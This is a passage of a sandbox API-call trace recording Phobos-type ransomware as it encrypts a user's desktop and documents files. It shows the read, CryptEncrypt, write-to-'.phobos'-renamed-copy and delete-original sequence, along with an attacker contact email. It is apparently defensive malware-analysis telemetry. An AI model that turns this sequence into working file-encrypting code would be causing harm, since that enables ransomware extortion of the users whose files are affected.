lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x169e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x169e0, lpOverlapped=0x0) returned 1 [0196.107] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.107] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.107] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0196.107] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.107] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0196.107] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.107] CloseHandle (hObject=0x134) returned 1 [0196.107] CloseHandle (hObject=0x180) returned 1 [0196.108] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vi6xmFqnUtCPLKmu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vi6xmfqnutcplkmu.wav")) returned 1 [0196.109] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XE425vM-hfc24 qDJojm.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xe425vm-hfc24 qdjojm.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.110] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=17389) returned 1 [0196.110] CloseHandle (hObject=0x180) returned 1 [0196.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XE425vM-hfc24 qDJojm.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xe425vm-hfc24 qdjojm.flv")) returned 0x20 [0196.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XE425vM-hfc24 qDJojm.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xe425vm-hfc24 qdjojm.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XE425vM-hfc24 qDJojm.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xe425vm-hfc24 qdjojm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.110] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.110] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XE425vM-hfc24 qDJojm.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xe425vm-hfc24 qdjojm.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.111] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0196.111] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.111] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43ed, lpOverlapped=0x0) returned 1 [0196.114] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x43f0, dwBufLen=0x43f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x43f0) returned 1 [0196.114] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x43f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x43f0, lpOverlapped=0x0) returned 1 [0196.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.115] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.115] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0196.115] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.115] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0196.203] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.203] CloseHandle (hObject=0x180) returned 1 [0196.203] CloseHandle (hObject=0x134) returned 1 [0196.203] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XE425vM-hfc24 qDJojm.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xe425vm-hfc24 qdjojm.flv")) returned 1 [0196.205] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\6opKb6.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\6opkb6.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.208] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=34410) returned 1 [0196.208] CloseHandle (hObject=0x180) returned 1 [0196.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\6opKb6.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\6opkb6.ppt")) returned 0x20 [0196.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\6opKb6.ppt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\6opkb6.ppt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\6opKb6.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\6opkb6.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.209] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.209] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\6opKb6.ppt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\6opkb6.ppt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.210] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0196.210] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.210] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x866a, lpOverlapped=0x0) returned 1 [0196.211] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8670, dwBufLen=0x8670 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8670) returned 1 [0196.211] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8670, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8670, lpOverlapped=0x0) returned 1 [0196.212] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.212] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.212] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.212] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.213] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.213] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.213] CloseHandle (hObject=0x180) returned 1 [0196.213] CloseHandle (hObject=0xac) returned 1 [0196.213] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\6opKb6.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\6opkb6.ppt")) returned 1 [0196.214] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\cFAWLKyfz_nZthT6X.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\cfawlkyfz_nztht6x.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.215] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=32959) returned 1 [0196.215] CloseHandle (hObject=0xac) returned 1 [0196.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\cFAWLKyfz_nZthT6X.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\cfawlkyfz_nztht6x.csv")) returned 0x20 [0196.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\cFAWLKyfz_nZthT6X.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\cfawlkyfz_nztht6x.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\cFAWLKyfz_nZthT6X.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\cfawlkyfz_nztht6x.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.216] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.216] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\cFAWLKyfz_nZthT6X.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\cfawlkyfz_nztht6x.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.217] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0196.217] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.217] ReadFile (in: hFile=0xac, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x80bf, lpOverlapped=0x0) returned 1 [0196.218] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80c0, dwBufLen=0x80c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80c0) returned 1 [0196.218] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x80c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x80c0, lpOverlapped=0x0) returned 1 [0196.220] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.220] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.220] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0196.220] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.220] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0196.220] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.220] CloseHandle (hObject=0xac) returned 1 [0196.220] CloseHandle (hObject=0x180) returned 1 [0196.220] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\cFAWLKyfz_nZthT6X.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\cfawlkyfz_nztht6x.csv")) returned 1 [0196.221] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\T_-3t.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\t_-3t.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.222] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=84246) returned 1 [0196.222] CloseHandle (hObject=0x180) returned 1 [0196.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\T_-3t.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\t_-3t.doc")) returned 0x20 [0196.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\T_-3t.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\t_-3t.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\T_-3t.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\t_-3t.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.222] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.222] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\T_-3t.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\t_-3t.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.223] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0196.223] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.223] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x14916, lpOverlapped=0x0) returned 1 [0196.225] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x14920, dwBufLen=0x14920 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x14920) returned 1 [0196.226] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x14920, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x14920, lpOverlapped=0x0) returned 1 [0196.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.228] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.228] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.228] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.228] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.228] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.228] CloseHandle (hObject=0x180) returned 1 [0196.228] CloseHandle (hObject=0xac) returned 1 [0196.228] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\T_-3t.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\t_-3t.doc")) returned 1 [0196.229] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\0o-e7mR20i.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\0o-e7mr20i.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.232] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=57234) returned 1 [0196.232] CloseHandle (hObject=0xac) returned 1 [0196.232] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\0o-e7mR20i.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\0o-e7mr20i.csv")) returned 0x20 [0196.232] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\0o-e7mR20i.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\0o-e7mr20i.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\0o-e7mR20i.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\0o-e7mr20i.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.232] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.232] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\0o-e7mR20i.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\0o-e7mr20i.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0196.233] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.233] ReadFile (in: hFile=0xac, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdf92, lpOverlapped=0x0) returned 1 [0196.235] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xdfa0, dwBufLen=0xdfa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xdfa0) returned 1 [0196.235] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xdfa0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, 